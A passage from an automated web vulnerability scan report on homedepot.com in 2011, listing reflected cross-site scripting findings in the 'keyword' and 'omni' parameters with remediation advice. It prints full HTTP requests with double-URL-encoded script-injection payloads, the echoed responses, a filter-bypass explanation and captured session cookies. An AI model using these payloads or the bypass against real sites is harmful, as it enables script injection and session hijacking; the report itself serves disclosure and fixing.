Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a85ca6f-5df4-1ce7-9678-00e0ed194bfc; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224138370%3a%3bC25%5fEXP%3d1360064138%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227738451%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2ckQjrscmhQuxLSR9cYv9SV7c0668%3d; s_pers=%20s_scOpen%3D1%7C1308225942967%3B%20s_campaign%3Dno%2520value%7C1308225943059%3B%20s_prevPage%3Dproductdetails%7C1308225943066%3B%20p_30%3DPIP%7C1308225943073%3B; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=6; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 224100
Expires: Thu, 16 Jun 2011 12:16:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:16:50 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308226610431%3a%3bC25%5fEXP%3d1360066610%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:16:50 GMT;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: WC_PERSISTENT=LAKVDoLQnflpITAZoTlEgUrFFDY%3d%0a%3b2011%2d06%2d16+08%3a16%3a50%2e467%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:20:18 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308230210467%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2c7ReKombG9JqXNTq7vJpbU38Wdo0%3d;Domain=.homedepot.com;Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xmlns="http://ww
...[SNIP]...
1="MostPopular";s.prop2="MostPopular";s.eVar3="MostPopular";s.hier1="Text Search>'"-->MaliciousScriptReplacedMaliciousScriptReplacedMaliciousScriptReplacednetsparker(0x0000AB)MaliciousScriptReplacedafb15<script>alert(1)</script>c38d2f33a46>
...[SNIP]...

3.177. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

Issue detail

The value of the keyword request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a4a06%253balert%25281%2529%252f%252fb77fcd64d48 was submitted in the keyword parameter. This input was echoed as a4a06;alert(1)//b77fcd64d48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the keyword request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253Ea4a06%253balert%25281%2529%252f%252fb77fcd64d48&omni=3&selectedCatgry=SEARCH+ALL HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a85ca6f-5df4-1ce7-9678-00e0ed194bfc; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224138370%3a%3bC25%5fEXP%3d1360064138%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227738451%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2ckQjrscmhQuxLSR9cYv9SV7c0668%3d; s_pers=%20s_scOpen%3D1%7C1308225942967%3B%20s_campaign%3Dno%2520value%7C1308225943059%3B%20s_prevPage%3Dproductdetails%7C1308225943066%3B%20p_30%3DPIP%7C1308225943073%3B; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=6; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 223812
Expires: Thu, 16 Jun 2011 12:16:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:16:49 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308226608886%3a%3bC25%5fEXP%3d1360066608%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:16:48 GMT;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:20:16 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308230208923%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cGgG44NIUY37MU5ADwaoi%2bvSsiP8%3d;Domain=.homedepot.com;Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xmlns="http://ww
...[SNIP]...
direct"));s.pageName="MostPopular";s.prop28="MostPopular";s.channel="Text Search>'"-->MaliciousScriptReplacedMaliciousScriptReplacedMaliciousScriptReplacednetsparker(0x0000AB)MaliciousScriptReplaceda4a06;alert(1)//b77fcd64d48MostPopular";s.prop1="MostPopular";s.prop2="MostPopular";s.eVar3="MostPopular";s.hier1="Text Search>
...[SNIP]...

3.178. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

Issue detail

The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52af5%2527%252dalert%25281%2529%252d%2527482e76a8c7a was submitted in the keyword parameter. This input was echoed as 52af5'-alert(1)-'482e76a8c7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the keyword request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253E52af5%2527%252dalert%25281%2529%252d%2527482e76a8c7a&omni=3&selectedCatgry=SEARCH+ALL HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a85ca6f-5df4-1ce7-9678-00e0ed194bfc; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224138370%3a%3bC25%5fEXP%3d1360064138%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227738451%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2ckQjrscmhQuxLSR9cYv9SV7c0668%3d; s_pers=%20s_scOpen%3D1%7C1308225942967%3B%20s_campaign%3Dno%2520value%7C1308225943059%3B%20s_prevPage%3Dproductdetails%7C1308225943066%3B%20p_30%3DPIP%7C1308225943073%3B; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=6; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 223860
Expires: Thu, 16 Jun 2011 12:16:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:16:47 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308226607157%3a%3bC25%5fEXP%3d1360066607%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:16:47 GMT;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: WC_PERSISTENT=OvrqFXuFuhec9MUp4hSfoN5ea3E%3d%0a%3b2011%2d06%2d16+08%3a16%3a47%2e188%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:20:15 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308230207188%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cs42uZo%2fXDK7i5ER64VTTZVKEfnk%3d;Domain=.homedepot.com;Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xmlns="http://ww
...[SNIP]...
1="MostPopular";s.prop2="MostPopular";s.eVar3="MostPopular";s.hier1="Text Search>'"-->MaliciousScriptReplacedMaliciousScriptReplacedMaliciousScriptReplacednetsparker(0x0000AB)MaliciousScriptReplaced52af5'-alert(1)-'482e76a8c7a>
...[SNIP]...

3.179. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [omni parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

Issue detail

The value of the omni request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f299%2527%253balert%25281%2529%252f%252fc29329b2a9e was submitted in the omni parameter. This input was echoed as 4f299';alert(1)//c29329b2a9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the omni request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253E&omni=34f299%2527%253balert%25281%2529%252f%252fc29329b2a9e&selectedCatgry=SEARCH+ALL HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a85ca6f-5df4-1ce7-9678-00e0ed194bfc; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; 